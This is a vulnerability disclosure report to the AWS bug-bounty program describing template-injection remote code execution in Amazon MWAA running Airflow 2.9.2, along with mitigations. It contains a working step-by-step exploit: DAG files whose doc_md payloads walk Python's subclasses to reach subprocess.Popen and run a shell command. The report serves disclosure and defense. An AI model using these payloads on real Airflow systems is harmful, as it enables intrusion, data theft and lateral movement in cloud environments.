Remote Code Execution in Amazon MWAA due to outdated Apache Airflow version
AWS VDP
Reported by
ricardojoserf
Vulnerability Details
Technical details and impact analysis
**Explanation:**
I am a penetration tester working with Siemens. During a collaborative security assessment with an internal team, I discovered a Remote Code Execution (RCE) vulnerability in an Amazon Managed Workflows for Apache Airflow (MWAA) environment. I initially reported this issue to the AWS security team via [email protected], and they directed me to submit it through this HackerOne program. I would also like to know to what extent executing code is legally acceptable here; since this is Amazon's infrastructure, I limited myself to a quick proof of concept to show the affected team how important it is to fix this issue.
**Description:**
The team using Amazon MWAA is currently running Apache Airflow version 2.9.2, which is affected by CVE-██████████-39877, a Server-Side Template Injection (SSTI) vulnerability that enables Remote Code Execution (RCE).
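For context, the vulnerability class is plain Jinja2 template injection: user-controlled text is rendered as a template, so expressions inside `{{ }}` are evaluated instead of displayed. A minimal, MWAA-independent illustration of the class (the `doc_md` rendering path in affected versions behaves analogously, per the PoC below):
```
# Minimal illustration of the SSTI class using plain Jinja2 (not MWAA-specific).
from jinja2 import Template

# Attacker-controlled text that ends up rendered as a template.
doc_md = "# Docs\n{{ 3 * 3 }}"

# The expression is evaluated rather than shown literally -- prints "9",
# the same signal used in step 1 of the reproduction below.
print(Template(doc_md).render())
```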
**Recommendations:**
Given the severity of this issue, I strongly recommend that:
- Amazon discontinue offering any Airflow version below 2.9.3 on the MWAA service.
- Classes that can be used to execute code in the context of the MWAA environment, such as *subprocess.Popen*, be made unreachable from templates (see the sandboxing sketch below).
- Any customers still running vulnerable versions be proactively notified, similar to how they are alerted when suspicious activity is detected, such as repeated requests to /robots.txt that may indicate web scanner activity.
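On the second point, one generic mitigation pattern for this class of issue (a sketch of the technique, not necessarily how Airflow's actual fix is implemented) is rendering untrusted text with Jinja2's `SandboxedEnvironment`, which rejects access to underscore-prefixed attributes such as `__class__`:
```
# Sketch of sandboxed rendering; illustrative only, not the actual MWAA/Airflow patch.
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

env = SandboxedEnvironment()
payload = "{{ ''.__class__.__mro__[1].__subclasses__() }}"

try:
    env.from_string(payload).render()
except SecurityError as exc:
    # The sandbox blocks underscore-prefixed attribute access, so the
    # class-walking payload used in the PoC below fails here.
    print(f"blocked: {exc}")
```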
## Steps To Reproduce:
1. First, upload a DAG file named "test_1.py" to the S3 bucket to check whether the vulnerability exists. If it does, a "9" should appear in the DAG docs when clicking "Grid" in the newly created "test_1" DAG; if not, the version might not be vulnerable:
```
from datetime import datetime, timedelta

from airflow import DAG
from airflow.operators.python import PythonOperator


def say_hello():
    print("Hello, world from Airflow!")


default_args = {
    'owner': 'airflow',
    'retries': 1,
    'retry_delay': timedelta(minutes=1),
}

with DAG(
    dag_id='test_1',
    default_args=default_args,
    description='Test One',
    schedule_interval='@daily',  # runs once a day
    start_date=datetime(███████),
    catchup=False,
    tags=['example'],
    # SSTI probe: "{{3*3}}" renders as "9" if doc_md is evaluated as a template
    doc_md="""
# Test 1
{{3*3}}
""",
) as dag:
    tarea_1 = PythonOperator(
        task_id='di_hola',
        python_callable=say_hello,
    )
```
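Uploading here means copying the file to the DAGs prefix of the environment's S3 bucket, from which MWAA picks up new DAGs. A minimal sketch using boto3, where the bucket name and `dags/` prefix are placeholders for your environment's configured values:
```
# Sketch only -- bucket name and key prefix below are placeholders; use the
# S3 bucket and DAGs path configured for your MWAA environment.
import boto3

s3 = boto3.client("s3")
s3.upload_file(
    Filename="test_1.py",
    Bucket="my-mwaa-bucket",  # placeholder
    Key="dags/test_1.py",     # typical MWAA DAGs prefix
)
```
The same can be done from the CLI with `aws s3 cp test_1.py s3://<bucket>/dags/`; the remaining DAG files are uploaded the same way.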
2. Second, upload a DAG file "test_2.py" to the S3 bucket to list the available classes, with code like this:
```
from datetime import datetime, timedelta

from airflow import DAG
from airflow.operators.python import PythonOperator


def say_hello():
    print("Hello, world from Airflow!")


default_args = {
    'owner': 'airflow',
    'retries': 1,
    'retry_delay': timedelta(minutes=1),
}

with DAG(
    dag_id='test_2',
    default_args=default_args,
    description='A very simple example DAG',
    schedule_interval='@daily',  # runs once a day
    start_date=datetime(██████),
    catchup=False,
    tags=['example'],
    # SSTI payload: dumps all subclasses of object to locate subprocess.Popen
    doc_md="""
# Test 2
{{ ''.__class__.__mro__[1].__subclasses__() }}
""",
) as dag:
    tarea_1 = PythonOperator(
        task_id='di_hola',
        python_callable=say_hello,
    )
```
3. Copy the list of available classes and find the index of the *subprocess.Popen* class. An easy way to do this is to copy all the classes up to the Popen class and count the number of commas before it; a sketch that automates this follows below. In my case the index was 309, but it will be different when you test this.
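The comma counting can also be automated. A rough sketch, assuming you paste the rendered list from the "test_2" DAG docs into the `rendered` variable (the string below is only an illustrative placeholder):
```
# Rough helper to automate the comma counting from step 3. Paste the rendered
# subclass list from the "test_2" DAG docs into `rendered`.
rendered = "[<class 'type'>, <class 'weakref'>, <class 'subprocess.Popen'>]"

entries = rendered.strip('[]').split(', ')
index = next(i for i, e in enumerate(entries) if 'subprocess.Popen' in e)
print(index)  # prints 2 for the placeholder; 309 in my environment
```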
4. Once you have a candidate index, verify the class name: if the index is correct, you should see "Popen". Upload "test_3.py". **NOTE**: Update the index to your own value; it will not be 309:
```
from datetime import datetime, timedelta

from airflow import DAG
from airflow.operators.python import PythonOperator


def say_hello():
    print("Hello, world from Airflow!")


default_args = {
    'owner': 'airflow',
    'retries': 1,
    'retry_delay': timedelta(minutes=1),
}

with DAG(
    dag_id='test_3',
    default_args=default_args,
    description='A very simple example DAG',
    schedule_interval='@daily',  # runs once a day
    start_date=datetime(██████),
    catchup=False,
    tags=['example'],
    # SSTI payload: verify the class at the index is Popen (adjust 309)
    doc_md="""
# Test 3
### Class Name
{{ ''.__class__.__mro__[1].__subclasses__()[309].__name__ }}
""",
) as dag:
    tarea_1 = PythonOperator(
        task_id='di_hola',
        python_callable=say_hello,
    )
```
5. Now, with the correct index, run a command in the context of the MWAA environment with "test_4.py". **NOTE**: Update the index to your own value; it will not be 309:
```
from datetime import datetime, timedelta

from airflow import DAG
from airflow.operators.python import PythonOperator


def say_hello():
    print("Hello, world from Airflow!")


default_args = {
    'owner': 'airflow',
    'retries': 1,
    'retry_delay': timedelta(minutes=1),
}

with DAG(
    dag_id='test_4',
    default_args=default_args,
    description='A very simple example DAG',
    schedule_interval='@daily',  # runs once a day
    start_date=datetime(█████),
    catchup=False,
    tags=['example'],
    # SSTI payload: run "id" via Popen; stdout=-1 is subprocess.PIPE
    doc_md="""
# Test 4
### Commands Output
{{ ''.__class__.__mro__[1].__subclasses__()[309]('id', shell=True, stdout=-1).communicate() }}
""",
) as dag:
    tarea_1 = PythonOperator(
        task_id='di_hola',
        python_callable=say_hello,
    )
```
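For reference, the expression injected via `doc_md` in "test_4.py" resolves to the equivalent of the following local call; `stdout=-1` is simply the integer value of `subprocess.PIPE`:
```
# Local equivalent of the expression injected in test_4.py.
import subprocess

# stdout=-1 is subprocess.PIPE; communicate() returns (stdout, stderr).
out, err = subprocess.Popen('id', shell=True, stdout=subprocess.PIPE).communicate()
print(out.decode())
```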
## Impact
**Summary:** An attacker can execute arbitrary commands remotely on the affected environment. While I limited my actions to a non-destructive proof-of-concept command, a malicious actor could leverage this vulnerability to access sensitive data, manipulate the system, or pivot to other resources within the same VPC. The risk includes potential full system compromise and lateral movement within the cloud infrastructure.
Report Details
Additional information and metadata
State: Closed
Substate: Informative
Weakness: Code Injection